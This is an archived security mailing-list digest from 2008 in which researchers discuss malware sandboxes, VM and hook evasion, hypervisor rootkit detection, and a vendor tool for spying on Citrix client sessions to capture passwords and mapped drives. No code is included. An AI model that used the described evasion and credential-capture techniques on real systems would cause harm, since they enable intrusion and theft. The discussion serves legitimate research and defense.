> trying really hard to find an address that defeats SafeSEH on 2003 SP0 
> in 15 minutes or less.

Are you talking about Microsoft Virtual PC or something else? What do you
mean by "moves memory all around"? If you boot 2003 SP0 inside a virtual
machine, the Windows kernel is not magically going to gain ASLR support,
so why why wouldn't a universal address work?

Alex
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 186 bytes
Desc: not available
Url : http://lists.immunitysec.com/pipermail/dailydave/attachments/20080224/305c4b8c/attachment.pgp 

From joanna at invisiblethings.org  Sun Feb 24 12:32:31 2008
From: joanna at invisiblethings.org (Joanna Rutkowska)
Date: Sun, 24 Feb 2008 18:32:31 +0100
Subject: [Dailydave] VPC
In-Reply-To: <272529341.20080223014144@Zoller.lu>
References: <47BD746D.5040201@immunityinc.com>
	<47BD9230.2090502@msu.edu>	<759087508.20080222111531@Zoller.lu>
	<47BEED21.3040406@msu.edu> <272529341.20080223014144@Zoller.lu>
Message-ID: <47C1AA2F.7090001@invisiblethings.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Thierry Zoller wrote:
| Some malware I've seen is actively detecing cwsandbox, sandboxie,
norman and vmware
| and is taking a different execution path and logic from there on. If
you try to
| detect  malware  using  sandboxes in an automatic fashion, that's a bad
| prerequisite.
|

While it might be true that *today* some malware behaves differently
depending on whether it detects a presence of a VMM (e.g. VMWare), this
is not expected to be true anymore in the near future. Right now there
is a trend to "virtualize everything" on the server side, but we also
start seeing trends to do that on the desktop platforms. It is quite
likely that within 3 years, most desktops will be running under some
sort of a hypervisor or will be hosting some hypervisor.

So, the question would be: whether my sandbox malware analyzer is or is
not indistinguishable from VMWare, XEN, VPC, etc.

j.

-----BEGIN PGP SIGNATURE-----

iQEVAwUBR8GqLswG7MOLAMOlAQIihAf/ZezfXiYQVdlwn3Ljw5wFRSR8XEEnbpEF
PrdsKpKAeATCYwoxEFfHzy3k5N0yRil1iG/Erjfg23LukqACNiL2MWxzIyedtCnv
HToMmkJXUS4xEJqnSeFDiPpJQHacSCa4RJF3YaaICwPeYcrmn8shJqzXvCPGrsNr
wO9rfYmm36zDSaLFDIM1vD45H6LfxyMYuggQYBfbD4l3/qgYRkxkGj5JI85SvSgn
wODEi4uhnc2YmcYkLt/QFlaDWmMLgrk5uqKNsjgYMORGTt3JgL9+h1y6mbui5Zk4
Ic+voZnt1TJV4UuqFZnHl7p+OEfbCrCayS5n/oVzPHTsX0N0+uMGkQ==
=SLnP
-----END PGP SIGNATURE-----

From demottja at msu.edu  Sun Feb 24 13:43:28 2008
From: demottja at msu.edu (Jared DeMott)
Date: Sun, 24 Feb 2008 13:43:28 -0500
Subject: [Dailydave] VPC
In-Reply-To: <47C0E902.5020708@bughunter.ca>
References: <974610891.20080223031746@Zoller.lu>	<47C08341.80800@hudakville.com>
	<47C0E902.5020708@bughunter.ca>
Message-ID: <47C1BAD0.6030601@msu.edu>

J.M. Seitz wrote:
> Hey since everyone is having such a lively debate, and we all seem like
> we wanna help, why not contribute? BoB (from PEid glory) and myself have
> started a Malware and Unpacking Framework for ImmunityDebugger (MUFFI)
> to help automate malware analysis tasks.
>
> Some things that are in there so far:
>
> - lots of anti-anti debugging routines
> - VMWare cloaking
> - ummm...some other stuff
>
> It's all done in Python and uses the native ImmDbg libraries to do its
> business. We never really "released" it but we are always looking for
> people to contribute to the source tree. If a piece of malware is using
> a specific mechanism to do VM/sandbox detection, then write the reverse
> and send us a patch!
>
> http://muffi.googlecode.com/
>
> JS
Awesome as always JS.  :)  One slight thing that can sometimes be an 
issue; 1st responders can only spend so much time down in the weeds. 
Check out Steve's work:
> http://code.google.com/p/rapier/
>
> Freeware information gathering tool
>   

From dan at geer.org  Mon Feb 25 18:05:13 2008
From: dan at geer.org (dan at geer.org)
Date: Mon, 25 Feb 2008 18:05:13 -0500
Subject: [Dailydave] VPC
In-Reply-To: Your message of "Sun, 24 Feb 2008 18:32:31 +0100."
	<47C1AA2F.7090001@invisiblethings.org> 
Message-ID: <20080225230513.2DC0533ECC@absinthe.tinho.net>


 | 
 | While it might be true that *today* some malware behaves
 | differently depending on whether it detects a presence of
 | a VMM (e.g. VMWare), this is not expected to be true anymore
 | in the near future. 
 | 


Might this be relevant to the conversation?

http://northsecuritylabs.com/

--dan


From joanna at invisiblethings.org  Mon Feb 25 18:34:39 2008
From: joanna at invisiblethings.org (Joanna Rutkowska)
Date: Tue, 26 Feb 2008 00:34:39 +0100
Subject: [Dailydave] VPC
In-Reply-To: <20080225230513.2DC0533ECC@absinthe.tinho.net>
References: <20080225230513.2DC0533ECC@absinthe.tinho.net>
Message-ID: <47C3508F.5080107@invisiblethings.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

dan at geer.org wrote:
|  |
|  | While it might be true that *today* some malware behaves
|  | differently depending on whether it detects a presence of
|  | a VMM (e.g. VMWare), this is not expected to be true anymore
|  | in the near future.
|  |
|
|
| Might this be relevant to the conversation?
|
| http://northsecuritylabs.com/
|

doubtful. see this:

http://theinvisiblethings.blogspot.com/2007/08/virtualization-detection-vs-blue-pill.html


j.
-----BEGIN PGP SIGNATURE-----

iQEVAwUBR8NQjcwG7MOLAMOlAQKArQf/YALvKKayc2RogfPb8r0qOpr/oAVFsqjH
DlqYu1zyoRpCDO1yqWCN34ZeWdCiJP492vfSMukdSjGFheEWg3/jiUcpZRURdv4m
oYlNnE4qdvNO7p82WWm9k9opjzcm1d2jYhSSJPdG/Ia+DOWjdb8wojZeV8RrNlR4
1F7zuFpoBUFLh4yR5BZDSR8h8mGt8YCFrg1sD+6xXpuQY+gUilbC/vtuhNN/IBLU
JNJLzYSwhi1Q25tI38LVzGE5F1XeXHurmJ0ET89G3g4jAXW2Vz5sLr0e4uOOxF1z
hdeTfPPZ7PaLNzLVIDdSWVvKYt7uvn76f+OrHKJAxDZAsl2dUpLTCA==
=uKky
-----END PGP SIGNATURE-----

From msuiche at gmail.com  Tue Feb 26 14:53:35 2008
From: msuiche at gmail.com (Matthieu Suiche)
Date: Tue, 26 Feb 2008 20:53:35 +0100
Subject: [Dailydave] SandMan 1.0.080226 is out!
Message-ID: <36615a170802261153i5c8ed565ga1c3e34c16d218e8@mail.gmail.com>

Hi everybody!

What is SandMan?

- SandMan is a framework providing a C library and a python portage to make
readable and writable the Windows hibernation file.
- SandMan is  released under GPLv3 licence.
- Actually, Only 32bits version of the hibernation file from Windows XP to
Windows 2008 are supported.

SandMan was firstly introduced at PacSec'07 and it is available at the
following link : http://sandman.msuiche.net <http://sandman.msuiche.net./>

Cheers,!
-- 
Matthieu Suiche
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20080226/09141a0f/attachment.htm 

From halvar at gmx.de  Tue Feb 26 05:46:03 2008
From: halvar at gmx.de (Halvar Flake)
Date: Tue, 26 Feb 2008 11:46:03 +0100
Subject: [Dailydave] VPC
In-Reply-To: <5603eb730802210751w25526e4atc283a9eee19a6415@mail.gmail.com>
References: <47BD746D.5040201@immunityinc.com>
	<5603eb730802210751w25526e4atc283a9eee19a6415@mail.gmail.com>
Message-ID: <47C3EDEB.7060006@gmx.de>

Thorsten Holz wrote:
> On Thu, Feb 21, 2008 at 1:54 PM, Dave Aitel <dave at immunityinc.com> wrote:
>
>   
>>  There's another one called CWSandbox that has a free web form you can
>>  send exe's to.
>>     
>
> You can either send a sample to <https://cwsandbox.org/?page=submit>
> or <http://research.sunbelt-software.com/submit.aspx>
> More info about the tool is available in an article
> (<http://pi1.informatik.uni-mannheim.de/filepool/publications/j2holz.pdf>)
>  and an example report is
> <https://cwsandbox.org/?page=details&id=156851&password=iokop>
>
>   
>> (They hook a bunch of things but I think you can escape
>>  the hooking by calling system calls directly?)
>>     
>
> But then you are not platform independent. CWSandbox was originally
> designed to automatically analyze the malware we capture with the help
> of honeypots (worms, bots, ...), but has evolved a lot since then
>   

OS-version independent API-hook bypassing is a very old hat (late 90's
?). Aside from checking for such hooks
(which many common packers do out-of-the-box, and have been doing since
... uhm ... almost a decade?),
the attacker has many choices to bypass the hook. I have seen many
variants of hook bypasses of various
quality over the years -- some samples include:
    * Checks for the exact OS version to then differentiate which exact
syscalls to use, then using syscalls
    * Inlining the first few bytes of OS functions into the executable,
then jumping to API+X
    * Packers that inline entire OS functions into the executable
None of these are entirely rocket science (altho (3) is kinda cute), and
platform-independence can be achieved
easily if one is willing to sacrifice Win9x (and, perhabs, Win2k)
compatibility.

Empirically, it is likely true that very little malware takes these
countermeasures. That just means that the authors
have decided that the cost of taking countermeasures (virtually zero)
isn't worth incurring yet.

It constantly amazes me in how many guises API hooks will cross my path
in my life -- I have
seen bad IPS based on it 7 years ago, then again 4 years ago etc. etc.

API hooking is great if you're dealing with a nonadversarial target. For
everything else, it's
useful as long as nobody decides it's worth 3 hours to deal with it

Cheers,
Halvar
PS: "Nobody will break into my house -- I put paper in front of my door.
No burglar has ever been
seen cutting paper in order to break in !" :-P

From info at d2sec.com  Wed Feb 27 13:17:32 2008
From: info at d2sec.com (DSquare Security)
Date: Wed, 27 Feb 2008 12:17:32 -0600
Subject: [Dailydave] Owning Citrix & Terminal Services Clients
Message-ID: <20080227181732.GA5679@d2sec.com>

Several vulnerabilities can help you to compromise a Citrix server or
a Terminal Services server. So the question is: what can you do when
you have a privileged access on these Citrix and Terminal Services
servers? The answer is simple: try to compromise Citrix and TS clients.

There are at least two interesting ways to access client data
1) Spying his session to get passwords from a published application
2) Accessing his local drives if they are mapped in the session

D2CiTerm is designed to help you in this kind of work. Here are two
demonstrations of this tool:

1) From a remote SYSTEM access after the exploitation of Citrix MPS 4.0
   IMA Service Heap overflow: http://www.d2sec.com/d2citerm_1.htm

2) From a privileged Citrix session: http://www.d2sec.com/d2citerm_2.htm


This tool will be released in the next update of D2 Exploitation Pack.


-- 
DSquare Security, LLC
http://www.d2sec.com


From anthony.lineberry at gmail.com  Mon Feb 25 22:34:24 2008
From: anthony.lineberry at gmail.com (Anthony Lineberry)
Date: Mon, 25 Feb 2008 19:34:24 -0800
Subject: [Dailydave] VPC
In-Reply-To: <47BD746D.5040201@immunityinc.com>
References: <47BD746D.5040201@immunityinc.com>
Message-ID: <a07a091e0802251934p7a456976ke6aefb3a03a258af@mail.gmail.com>

On Thu, Feb 21, 2008 at 4:54 AM, Dave Aitel <dave at immunityinc.com> wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
>  Hash: SHA1
>
>  So in the Microsoft/Immunity/iSec Defend the Flag class here at BlackHat
>  Federal, I learned the hard way that VPC moves memory all around and
>  your previously great universal addresses don't work. So you'll end up
>  trying really hard to find an address that defeats SafeSEH on 2003 SP0
>  in 15 minutes or less.
>
>  Also I notice there are a lot of companies doing automated Incident
>  Response or malware analysis now.
>
>  Zynamic's VxClass is obviously one of my favorites.
>  HBGary has retooled Inspector into a tool ("Responder") that can read
>  and analyze physical memory dumps.
>  Mandiant has their new tool out.
>  Norman had a softice-looking sandbox-like thing on display.
>  There's another one called CWSandbox that has a free web form you can
>  send exe's to. (They hook a bunch of things but I think you can escape
>  the hooking by calling system calls directly?)
>
>  And let me also put it this way: If you have a source code analyzer
>  product booth, and you don't let people write little C programs and have
>  them analyzed, it's really annoying.
>
>  - -dave
>
>  -----BEGIN PGP SIGNATURE-----
>  Version: GnuPG v1.4.6 (GNU/Linux)
>  Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
>
>  iD8DBQFHvXRstehAhL0gheoRApfGAJ9Bqr7bW57kHPSxkoExDbLs+kQ3eQCdE5Of
>  o+Wc9Ml2BVcy2h0aoFJC630=
>  =lAdf
>  -----END PGP SIGNATURE-----
>
>  _______________________________________________
>  Dailydave mailing list
>  Dailydave at lists.immunitysec.com
>  http://lists.immunitysec.com/mailman/listinfo/dailydave
>

Is this sandboxing running outside of the hypervisor or inside?
One thing i've been messing with is lately is sandboxing from outside the guest
os by modifying a hypervisor to manipulate the kernel through external
hooks. I'm really curious is this has been done before and if i'm just
reinventing the wheel?

-- 
Anthony Lineberry
http://www.dtors.org

From dave.korn at artimi.com  Thu Feb 28 09:32:49 2008
From: dave.korn at artimi.com (Dave Korn)
Date: Thu, 28 Feb 2008 14:32:49 -0000
Subject: [Dailydave] Owning Citrix & Terminal Services Clients
In-Reply-To: <20080227181732.GA5679@d2sec.com>
References: <20080227181732.GA5679@d2sec.com>
Message-ID: <008c01c87a16$cb35a9a0$2e08a8c0@CAM.ARTIMI.COM>

On 27 February 2008 18:18, DSquare Security wrote:

> There are at least two interesting ways to access client data
> 1) Spying his session to get passwords from a published application
> 2) Accessing his local drives if they are mapped in the session

  Not to mention the IPC$ share and all those pipes you can't get at (because
of RestrictAnonymous=1 these days) without being authenticated.


    cheers,
      DaveK
-- 
Can't think of a witty .sigline today....


From matt.richard at gmail.com  Thu Feb 28 18:43:57 2008
From: matt.richard at gmail.com (Matt Richard)
Date: Thu, 28 Feb 2008 18:43:57 -0500
Subject: [Dailydave] VPC
In-Reply-To: <a07a091e0802251934p7a456976ke6aefb3a03a258af@mail.gmail.com>
References: <47BD746D.5040201@immunityinc.com>
	<a07a091e0802251934p7a456976ke6aefb3a03a258af@mail.gmail.com>
Message-ID: <276004ce0802281543l16babc4bja6be34c4fdbbdef7@mail.gmail.com>

On Mon, Feb 25, 2008 at 10:34 PM, Anthony Lineberry
<anthony.lineberry at gmail.com> wrote:
>  Is this sandboxing running outside of the hypervisor or inside?
>  One thing i've been messing with is lately is sandboxing from outside the guest
>  os by modifying a hypervisor to manipulate the kernel through external
>  hooks. I'm really curious is this has been done before and if i'm just
>  reinventing the wheel?

I have only seen defensive implementations such as the work of
Garfinkel and Rosenblum at Stanford.  Their use case is a modified
hypervisor that can monitor critical OS data structures.  One of their
implementations watches the Linux system call table and can prevent
modification to thwart rootkits.

http://www.cs.fit.edu/%7Epkc/id/related/garfinkel03ndssVM.pdf

I think it's a great idea, I'd be interested in seeing any published
work you have on the topic.

Regards,

Matt

From jon at oberheide.org  Fri Feb 29 09:57:45 2008
From: jon at oberheide.org (Jon Oberheide)
Date: Fri, 29 Feb 2008 09:57:45 -0500
Subject: [Dailydave] VPC
In-Reply-To: <276004ce0802281543l16babc4bja6be34c4fdbbdef7@mail.gmail.com>
References: <47BD746D.5040201@immunityinc.com>
	<a07a091e0802251934p7a456976ke6aefb3a03a258af@mail.gmail.com>
	<276004ce0802281543l16babc4bja6be34c4fdbbdef7@mail.gmail.com>
Message-ID: <1204297065.6223.1.camel@apollo>

On Thu, 2008-02-28 at 18:43 -0500, Matt Richard wrote:
> On Mon, Feb 25, 2008 at 10:34 PM, Anthony Lineberry
> <anthony.lineberry at gmail.com> wrote:
> >  Is this sandboxing running outside of the hypervisor or inside?
> >  One thing i've been messing with is lately is sandboxing from outside the guest
> >  os by modifying a hypervisor to manipulate the kernel through external
> >  hooks. I'm really curious is this has been done before and if i'm just
> >  reinventing the wheel?
> 
> I have only seen defensive implementations such as the work of
> Garfinkel and Rosenblum at Stanford.  Their use case is a modified
> hypervisor that can monitor critical OS data structures.  One of their
> implementations watches the Linux system call table and can prevent
> modification to thwart rootkits.

In related news, VMware just recently announced VMsafe:

http://www.vmware.com/overview/security/vmsafe.html

-- 
Jon Oberheide <jon at oberheide.org>
GnuPG Key: 1024D/F47C17FE
Fingerprint: B716 DA66 8173 6EDD 28F6  F184 5842 1C89 F47C 17FE
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: This is a digitally signed message part
Url : http://lists.immunitysec.com/pipermail/dailydave/attachments/20080229/fad7fd91/attachment.pgp 

From rodrigo at kernelhacking.com  Fri Feb 29 07:56:11 2008
From: rodrigo at kernelhacking.com (Rodrigo Rubira Branco (BSDaemon))
Date: Fri, 29 Feb 2008 12:56:11 -0000
Subject: [Dailydave] VPC
Message-ID: <20080229155611.8DA988BF42@mail.fjaunet.com.br>

> I have only seen defensive implementations such as the work of
> Garfinkel and Rosenblum at Stanford.  Their use case is a modified
> hypervisor that can monitor critical OS data structures.  One of their
> implementations watches the Linux system call table and can prevent
> modification to thwart rootkits.
>
> I think it's a great idea, I'd be interested in seeing any published
> work you have on the topic.

StMichael running in SMM tries to accomplish the same in architectures where
virtualization is not supported:
http://www.kernelhacking.com/rodrigo/docs/H2HCIV.pdf

The idea is to port it also to be implemented using the hypervisor support
of the modern processors...



cya,



Rodrigo (BSDaemon)


--
www.kernelhacking.com/rodrigo


From joanna at invisiblethings.org  Fri Feb 29 13:17:43 2008
From: joanna at invisiblethings.org (Joanna Rutkowska)
Date: Fri, 29 Feb 2008 19:17:43 +0100
Subject: [Dailydave] VPC
In-Reply-To: <20080229155611.8DA988BF42@mail.fjaunet.com.br>
References: <20080229155611.8DA988BF42@mail.fjaunet.com.br>
Message-ID: <47C84C47.6010307@invisiblethings.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Rodrigo Rubira Branco (BSDaemon) wrote:
| StMichael running in SMM tries to accomplish the same in architectures
where
| virtualization is not supported:
| http://www.kernelhacking.com/rodrigo/docs/H2HCIV.pdf
|

Let me point out some issues here:

1) On slide #13 you refer to me (at least I assume it is me):

"Joanna said we need a new hardware-help [to protect against kernel
compromises], really?"

and then on slide #21 you explain:

"That's [i.e. protecting against protector's code tampering] the
motivation in the Joanna's comment about we need new hardware helping us..."

So, let me explain, that the biggest problem with kernel compromise
detection I have been talking about for at least 2 years now, is the
fact that we don't know all the possible hooking places (type II hooking
places) that an attacker might use, *not* the problem of tamper proof
detector code.

Another reason for seeking help in hardware, this time when implementing
kernel protection (as opposed to detection) is that for an effective
protection we need to move drivers (or groups of drivers) into separate
domains/address spaces. We can not effectively do that without IOMMU/VT-d.

2) On slides #54 you write: "The idea of putting the entire kernel as
read-only seems good". Let me just point out that there is no such thing
as "read-only kernel" -- kernel is a program, and as every program it
also needs to use and operate on *data* that change all the time and
cannot be made read-only by definition. So even if you can force the
kernel *code* to be read-only (which is a good idea indeed and digital
signatures are useful in actually verifying this property), the kernel
as a whole, is always read/write.

It seems to me that StMichael focuses more on detecting rootkit's code
rather then ensuring system integrity. Just out of curiosity I would
love to see a list of all the places that are checked by StMichael.

3) While the whole idea of putting own code into SMM seems interesting,
I see it much more useful for writing kernel malware rather then
security tools. I really don't see a reason why to use this "hack"
instead of using the virtualization technology, which was designed just
for such tasks among others?

4) BTW, AFAIK modern laptops have their SMRAM locked down just after it
is initialized by SMM. Are you going to bypass this locking mechanism in
order to install your protection system?

Cheers,
joanna.
-----BEGIN PGP SIGNATURE-----

iQEVAwUBR8hMRcwG7MOLAMOlAQKLUQgArbD+tQXRM5PRC6ovv1jUVvrj6EPXhXNv
8+QI/C9AVYRMOmtbZnFqEd8b/ZHn1F9alaMJ9It1FFnNs+cNrNjxf1RtBbctKJfc
Wck+rTuJsZsbMTO4knQez2/5SODiBJn6cWAkhFaV5OxmnTQviXTpuk4JysxrBrC9
lXKAzkisrCAbAvLjL8ttr3VHhQaijlPhTV34Omzh0TtwPm+uWh/4O3GC53frLM26
F0ruywJpO+HHyVPF/sxye4iOgfSB07bO+fsY0Ps6N+5vaQhkKW4pJ9IWDQKll7w7
efGH7SukYgoFkdbnDP1qRHvrqb1t7gxMJUHqLOsV/DRENeosIDOL/A==
=CCaj
-----END PGP SIGNATURE-----

From joanna at invisiblethings.org  Fri Feb 29 13:49:18 2008
From: joanna at invisiblethings.org (Joanna Rutkowska)
Date: Fri, 29 Feb 2008 19:49:18 +0100
Subject: [Dailydave] VPC
In-Reply-To: <47C84C47.6010307@invisiblethings.org>
References: <20080229155611.8DA988BF42@mail.fjaunet.com.br>
	<47C84C47.6010307@invisiblethings.org>
Message-ID: <47C853AE.3090404@invisiblethings.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Joanna Rutkowska wrote:
| 4) BTW, AFAIK modern laptops have their SMRAM locked down just after
| it is initialized by SMM. Are you going to bypass this locking
| mechanism in order to install your protection system?
|

s/SMM/BIOS/ in the text above.

joanna.
-----BEGIN PGP SIGNATURE-----

iQEVAwUBR8hTqMwG7MOLAMOlAQIZmQf9HBQNyD19C7YypFelrD6bVePbict/6qX3
rjCIuHNiYqamLTXTyG1tatMca+aTsJoIgZGy2CIU2W7axf0sHcxMpoZ06KPS8gDu
wN664l9CnAyN1+cSgM5YqxkxrXv4NXyurCjVr1bGikEAi1eZ7gkJ1vONeUdkgBV+
0SxWudJQAv/QLTWb9hkYgHOBLLW6tHotbfZwjK6rTgMhGjst8z947nHX0EI4N2rv
9rRuzxEuDd9v4wRvobb2931v2MBRNE3C71ZhAqnSr9PHz8sksULmT8B9mwZhD4xN
vLAMdAjwuVDTrHbpFKj7r4aGdc+pX+yFG1T96ZXwEfwshY/CKNkCbA==
=dFFE
-----END PGP SIGNATURE-----